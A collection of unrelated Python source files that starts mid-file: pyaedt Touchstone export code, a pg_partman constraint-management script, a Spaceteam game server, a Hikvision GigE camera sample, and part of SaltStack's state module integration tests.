f1.write(lin)
elif "ProductPath" in line:
lin = "\\ \\ ProductPath =\\'{}\\'\\\n".format(aedt_full_exe_path)
f1.write(lin)
elif "WaitForLicense" in line:
lin = "\\ \\ WaitForLicense={}\\\n".format(str(wait_for_license).lower())
f1.write(lin)
else:
f1.write(line)
f1.close()
return self.odesktop.SubmitJob(os.path.join(project_path, "Job_settings.areg"), project_file)
@pyaedt_function_handler()
def _export_touchstone(
self, solution_name=None, sweep_name=None, file_name=None, variations=None, variations_value=None
):
"""Export the Touchstone file to a local folder.
Parameters
----------
solution_name : str, optional
Name of the solution that has been solved.
sweep_name : str, optional
Name of the sweep that has been solved.
This parameter has to be ignored or set with same value as solution_name
file_name : str, optional
Full path and name for the Touchstone file. The default is ``None``,
which exports the file to the working directory.
variations : list, optional
List of all parameter variations. For example, ``["$AmbientTemp", "$PowerIn"]``.
The default is ``None``.
variations_value : list, optional
List of all parameter variation values. For example, ``["22cel", "100"]``.
The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if variations is None:
variations = list(self.available_variations.nominal_w_values_dict.keys())
if variations_value is None:
variations_value = [str(x) for x in list(self.available_variations.nominal_w_values_dict.values())]
if solution_name is None:
nominal_sweep_list = [x.strip() for x in self.nominal_sweep.split(":")]
solution_name = nominal_sweep_list[0]
if self.design_type == "Circuit Design":
sweep_name = solution_name
else:
if sweep_name is None:
for sol in self.existing_analysis_sweeps:
if solution_name == sol.split(":")[0].strip():
sweep_name = sol.split(":")[1].strip()
break
if self.design_type == "HFSS 3D Layout Design":
n = str(len(self.port_list))
else:
n = str(len(self.excitations))
# Normalize the save path
if not file_name:
appendix = ""
for v, vv in zip(variations, variations_value):
appendix += "_" + v + vv.replace("'", "")
ext = ".S" + n + "p"
filename = os.path.join(self.working_directory, solution_name + "_" + sweep_name + appendix + ext)
else:
filename = file_name.replace("//", "/").replace("\\", "/")
self.logger.info("Exporting Touchstone " + filename)
DesignVariations = ""
for i in range(len(variations)):
DesignVariations += str(variations[i]) + "='" + str(variations_value[i].replace("'", "")) + "' "
# DesignVariations = "$AmbientTemp=\'22cel\' $PowerIn=\'100\'"
# array containing "SetupName:SolutionName" pairs (note that setup and solution are separated by a colon)
SolutionSelectionArray = [solution_name + ":" + sweep_name]
# 2=tab delimited spreadsheet (.tab), 3= touchstone (.sNp), 4= CitiFile (.cit),
# 7=Matlab (.m), 8=Terminal Z0 spreadsheet
FileFormat = 3
OutFile = filename # full path of output file
# array containin the frequencies to export, use ["all"] for all frequencies
FreqsArray = ["all"]
DoRenorm = True # perform renormalization before export
RenormImped = 50 # Real impedance value in ohm, for renormalization
DataType = "S" # Type: "S", "Y", or "Z" matrix to export
Pass = -1 # The pass to export. -1 = export all passes.
ComplexFormat = 0 # 0=Magnitude/Phase, 1=Real/Immaginary, 2=dB/Phase
DigitsPrecision = 15 # Touchstone number of digits precision
IncludeGammaImpedance = True # Include Gamma and Impedance in comments
NonStandardExtensions = False # Support for non-standard Touchstone extensions
if self.design_type == "HFSS":
self.osolution.ExportNetworkData(
DesignVariations,
SolutionSelectionArray,
FileFormat,
OutFile,
FreqsArray,
DoRenorm,
RenormImped,
DataType,
Pass,
ComplexFormat,
DigitsPrecision,
False,
IncludeGammaImpedance,
NonStandardExtensions,
)
else:
self.odesign.ExportNetworkData(
DesignVariations,
SolutionSelectionArray,
FileFormat,
OutFile,
FreqsArray,
DoRenorm,
RenormImped,
DataType,
Pass,
ComplexFormat,
DigitsPrecision,
False,
IncludeGammaImpedance,
NonStandardExtensions,
)
self.logger.info("Touchstone correctly exported to %s", filename)
return True
@pyaedt_function_handler()
def value_with_units(self, value, units=None):
"""Combine a number and a string containing the unit in a single string e.g. "1.2mm".
If the units are not specified, the model units are used.
If value is a string (like containing an expression), it is returned as is.
Parameters
----------
value : float, int, str
Value of the number or string containing an expression.
units : str, optional
Units to combine with value.
Returns
-------
str
String that combines the value and the units (e.g. "1.2mm").
"""
if isinstance(value, str):
val = value
else:
if units is None:
units = self.modeler.model_units
val = "{0}{1}".format(value, units)
return val
|
reapply_constraints.py
|
#!/usr/bin/env python
import argparse, psycopg2, sys, time
from multiprocessing import Process
parser = argparse.ArgumentParser(description="Script for reapplying additional constraints managed by pg_partman on child tables. See docs for additional info on this special constraint management. Script runs in two distinct modes: 1) Drop all constraints 2) Apply all constraints. Typical usage would be to run the drop mode, edit the data, then run apply mode to re-create all constraints on a partition set.")
parser.add_argument('-p', '--parent', required=True, help="Parent table of an already created partition set. (Required)")
parser.add_argument('-c', '--connection', default="host=localhost", help="""Connection string for use by psycopg to connect to your database. Defaults to "host=localhost".""")
parser.add_argument('-d', '--drop_constraints', action="store_true", help="Drop all constraints managed by pg_partman. Drops constraints on all child tables including current & future.")
parser.add_argument('-a', '--add_constraints', action="store_true", help="Apply configured constraints to all child tables older than the premake value.")
parser.add_argument('-j', '--jobs', type=int, default=0, help="Use the python multiprocessing library to recreate indexes in parallel. Value for -j is number of simultaneous jobs to run. Note that this is per table, not per index. Be very careful setting this option if load is a concern on your systems.")
parser.add_argument('-w', '--wait', type=float, default=0, help="Wait the given number of seconds after a table has had its constraints dropped or applied before moving on to the next. When used with -j, this will set the pause between the batches of parallel jobs instead.")
parser.add_argument('--dryrun', action="store_true", help="Show what the script will do without actually running it against the database. Highly recommend reviewing this before running.")
parser.add_argument('-q', '--quiet', action="store_true", help="Turn off all output.")
args = parser.parse_args()
if args.parent.find(".") < 0:
print("Parent table must be schema qualified")
sys.exit(2)
if args.drop_constraints and args.add_constraints:
print("Can only set one or the other of --drop_constraints (-d) and --add_constraints (-a)")
sys.exit(2)
if (args.drop_constraints == False) and (args.add_constraints == False):
print("Must set one of --drop_constraints (-d) or --add_constraints (-a)")
sys.exit(2)
def create_conn():
conn = psycopg2.connect(args.connection)
return conn
def close_conn(conn):
conn.close()
def get_partman_schema(conn):
cur = conn.cursor()
sql = "SELECT nspname FROM pg_catalog.pg_namespace n, pg_catalog.pg_extension e WHERE e.extname = 'pg_partman' AND e.extnamespace = n.oid"
cur.execute(sql)
partman_schema = cur.fetchone()[0]
cur.close()
return partman_schema
def get_children(conn, partman_schema):
cur = conn.cursor()
sql = "SELECT " + partman_schema + ".show_partitions(%s, %s)"
cur.execute(sql, [args.parent, 'ASC'])
child_list = cur.fetchall()
cur.close()
return child_list
def get_premake(conn, partman_schema):
cur = conn.cursor()
sql = "SELECT premake FROM " + partman_schema + ".part_config WHERE parent_table = %s"
cur.execute(sql, [args.parent])
premake = int(cur.fetchone()[0])
cur.close()
return premake
def apply_proc(child_table, partman_schema):
conn = create_conn()
conn.autocommit = True
cur = conn.cursor()
sql = "SELECT " + partman_schema + ".apply_constraints(%s, %s, %s, %s)"
debug = False;
if not args.quiet:
debug = True
print(cur.mogrify(sql, [args.parent, child_table, False, debug]))
if not args.dryrun:
cur.execute(sql, [args.parent, child_table, False, debug])
cur.close()
close_conn(conn)
def drop_proc(child_table, partman_schema):
conn = create_conn()
conn.autocommit = True
cur = conn.cursor()
sql = "SELECT " + partman_schema + ".drop_constraints(%s, %s, %s)"
debug = False;
if not args.quiet:
debug = True
print(cur.mogrify(sql, [args.parent, child_table, debug]))
if not args.dryrun:
cur.execute(sql, [args.parent, child_table, debug])
cur.close()
close_conn(conn)
if __name__ == "__main__":
main_conn = create_conn()
partman_schema = get_partman_schema(main_conn)
child_list = get_children(main_conn, partman_schema)
premake = get_premake(main_conn, partman_schema)
if args.add_constraints:
# Remove tables from the list of child tables that shouldn't have constraints yet
for x in range((premake * 2) + 1):
child_list.pop()
if args.jobs == 0:
for c in child_list:
if args.drop_constraints:
drop_proc(c[0], partman_schema)
if args.add_constraints:
apply_proc(c[0], partman_schema)
if args.wait > 0:
time.sleep(args.wait)
else:
child_list.reverse()
while len(child_list) > 0:
if not args.quiet:
print("Jobs left in queue: " + str(len(child_list)))
if len(child_list) < args.jobs:
args.jobs = len(child_list)
processlist = []
for num in range(0, args.jobs):
c = child_list.pop()
if args.drop_constraints:
p = Process(target=drop_proc, args=(c[0], partman_schema))
if args.add_constraints:
p = Process(target=apply_proc, args=(c[0], partman_schema))
p.start()
processlist.append(p)
for j in processlist:
j.join()
if args.wait > 0:
time.sleep(args.wait)
sql = 'ANALYZE ' + args.parent
main_cur = main_conn.cursor()
if not args.quiet:
print(main_cur.mogrify(sql))
if not args.dryrun:
main_cur.execute(sql)
close_conn(main_conn)
|
spaceteam.py
|
import random
from server import Command, commands
from proto.spaceteam_pb2 import SpaceteamPacket
from threading import Thread
BASE_TIME = 50
LOSE_POINTS = 0
WIN_POINTS = 200
POINT_INCREMENT = 15
POINT_DECREMENT = 15
class SpaceTeam:
def __init__(self, lobby, server):
self.lobby = lobby
self.server = server
self.players = []
self.commands = []
self.state = None
self.clock = 0
self.sector = 1
self.life = 100
self.packet = SpaceteamPacket()
def getPlayerId(address):
ip_addr, port = address
return '{}:{}'.format(ip_addr, port)
def addPlayer(self, address):
ip_addr, port = address
self.players.append({
'ip_addr': ip_addr,
'port': port,
'ready': False
})
def removePlayer(self, address):
ip_addr, port = address
self.players = [*filter(
lambda player:
player['ip_addr'] != ip_addr or player['port'] != port,
self.players
)]
def toggleReady(self, address, state):
ip_addr, port = address
self.players = [*map(
lambda player:
{ **player, 'ready': state }
if player['ip_addr'] == ip_addr and player['port'] == port
else player,
self.players
)]
# Check if all players are ready
if all([player['ready'] for player in self.players]):
return True
else:
return False
def updateLife(self, amount):
self.life += amount
# if self.life > 100:
# self.life = 100
print('[LIFE] Life Remaining: {}'.format(self.life))
def checkResolved(self, panel, command):
for cmd in range(len(self.commands)):
slug = self.commands[cmd].name.upper().replace(' ', '_')
props = str(self.commands[cmd].command).upper()
print(slug, props, command, panel)
if(slug == command) and (props == str(panel).upper()):
self.commands[cmd].isResolved = True
self.commands[cmd].state = self.commands[cmd].command
self.updateLife(25)
print("Successfully Resolved", panel, " to ", command)
break
def _start(self):
no_command = Command(commands.types.NO_COMMAND, self.server)
no_command.spawn(self.players)
if len(self.players) == 1: panelRange = 7
elif len(self.players) == 2: panelRange = 13
elif len(self.players) == 3: panelRange = 20
elif len(self.players) == 4: panelRange = 27
else: return
panels = [ i for i in range(panelRange) ]
panels = [ Command(panel, self.server, updateLife=self.updateLife) for panel in panels ]
print([i.name for i in panels])
self.commands = random.sample(panels, len(self.players))
while self.life > LOSE_POINTS and self.life < WIN_POINTS:
for cmd in range(len(self.commands)):
if self.commands[cmd].isResolved:
# Populate with new commands
address = (self.players[cmd]['ip_addr'], self.players[cmd]['port'])
self.commands[cmd] = random.sample(panels, 1)[0]
self.commands[cmd].spawn(address)
packet = self.packet
payload = packet.GameStatePacket()
payload.type = packet.GAME_STATE
payload.update = packet.GameStatePacket.GAME_OVER
for cmd in range(len(self.commands)):
self.commands[cmd].isResolved = True
if self.life <= LOSE_POINTS:
payload.isWin = False
self.server.connection.broadcast(self.players, payload)
elif self.life >= WIN_POINTS:
payload.isWin = True
self.server.connection.broadcast(self.players, payload)
def start(self):
Thread(target=self._start).start()
|
ConnectSpecCamera.py
|
# -- coding: utf-8 --
import time
import sys
import threading
import msvcrt
from ctypes import *
sys.path.append("../MvImport")
from MvCameraControl_class import *
g_bExit = False
# 为线程定义一个函数
def work_thread(cam, pData):
stOutFrame = MV_FRAME_OUT()
memset(byref(stOutFrame), 0, sizeof(stOutFrame))
while True:
ret = cam.MV_CC_GetImageBuffer(stOutFrame, 1000)
if None != stOutFrame.pBufAddr and 0 == ret:
print ("get one frame: Width[%d], Height[%d], nFrameNum[%d]" % (stOutFrame.stFrameInfo.nWidth, stOutFrame.stFrameInfo.nHeight, stOutFrame.stFrameInfo.nFrameNum))
nRet = cam.MV_CC_FreeImageBuffer(stOutFrame)
else:
print ("no data[0x%x]" % ret)
if g_bExit == True:
break
if __name__ == "__main__":
stDevInfo = MV_CC_DEVICE_INFO()
stGigEDev = MV_GIGE_DEVICE_INFO()
if sys.version >= '3':
deviceIp = input("please input current camera ip : ")
netIp = input("please input net export ip : ")
else:
deviceIp = raw_input("please input current camera ip : ")
netIp = raw_input("please input net export ip : ")
deviceIpList = deviceIp.split('.')
stGigEDev.nCurrentIp = (int(deviceIpList[0]) << 24) | (int(deviceIpList[1]) << 16) | (int(deviceIpList[2]) << 8) | int(deviceIpList[3])
netIpList = netIp.split('.')
stGigEDev.nNetExport = (int(netIpList[0]) << 24) | (int(netIpList[1]) << 16) | (int(netIpList[2]) << 8) | int(netIpList[3])
stDevInfo.nTLayerType = MV_GIGE_DEVICE
stDevInfo.SpecialInfo.stGigEInfo = stGigEDev
# ch:创建相机实例 | en:Creat Camera Object
cam = MvCamera()
# ch:选择设备并创建句柄 | en:Select device and create handle
ret = cam.MV_CC_CreateHandle(stDevInfo)
if ret != 0:
print ("create handle fail! ret[0x%x]" % ret)
sys.exit()
# ch:打开设备 | en:Open device
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Exclusive, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
# ch:探测网络最佳包大小(只对GigE相机有效) | en:Detection network optimal package size(It only works for the GigE camera)
if stDevInfo.nTLayerType == MV_GIGE_DEVICE:
nPacketSize = cam.MV_CC_GetOptimalPacketSize()
if int(nPacketSize) > 0:
ret = cam.MV_CC_SetIntValue("GevSCPSPacketSize",nPacketSize)
if ret != 0:
print ("Warning: Set Packet Size fail! ret[0x%x]" % ret)
else:
print ("Warning: Get Packet Size fail! ret[0x%x]" % nPacketSize)
# ch:设置触发模式为off | en:Set trigger mode as off
ret = cam.MV_CC_SetEnumValue("TriggerMode", MV_TRIGGER_MODE_OFF)
if ret != 0:
print ("set trigger mode fail! ret[0x%x]" % ret)
sys.exit()
# ch:开始取流 | en:Start grab image
ret = cam.MV_CC_StartGrabbing()
if ret != 0:
print ("start grabbing fail! ret[0x%x]" % ret)
sys.exit()
try:
hThreadHandle = threading.Thread(target=work_thread, args=(cam, None))
hThreadHandle.start()
except:
print ("error: unable to start thread")
print ("press a key to stop grabbing.")
msvcrt.getch()
g_bExit = True
hThreadHandle.join()
# ch:停止取流 | en:Stop grab image
ret = cam.MV_CC_StopGrabbing()
if ret != 0:
print ("stop grabbing fail! ret[0x%x]" % ret)
sys.exit()
# ch:关闭设备 | Close device
ret = cam.MV_CC_CloseDevice()
if ret != 0:
print ("close deivce fail! ret[0x%x]" % ret)
sys.exit()
# ch:销毁句柄 | Destroy handle
ret = cam.MV_CC_DestroyHandle()
if ret != 0:
print ("destroy handle fail! ret[0x%x]" % ret)
sys.exit()
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
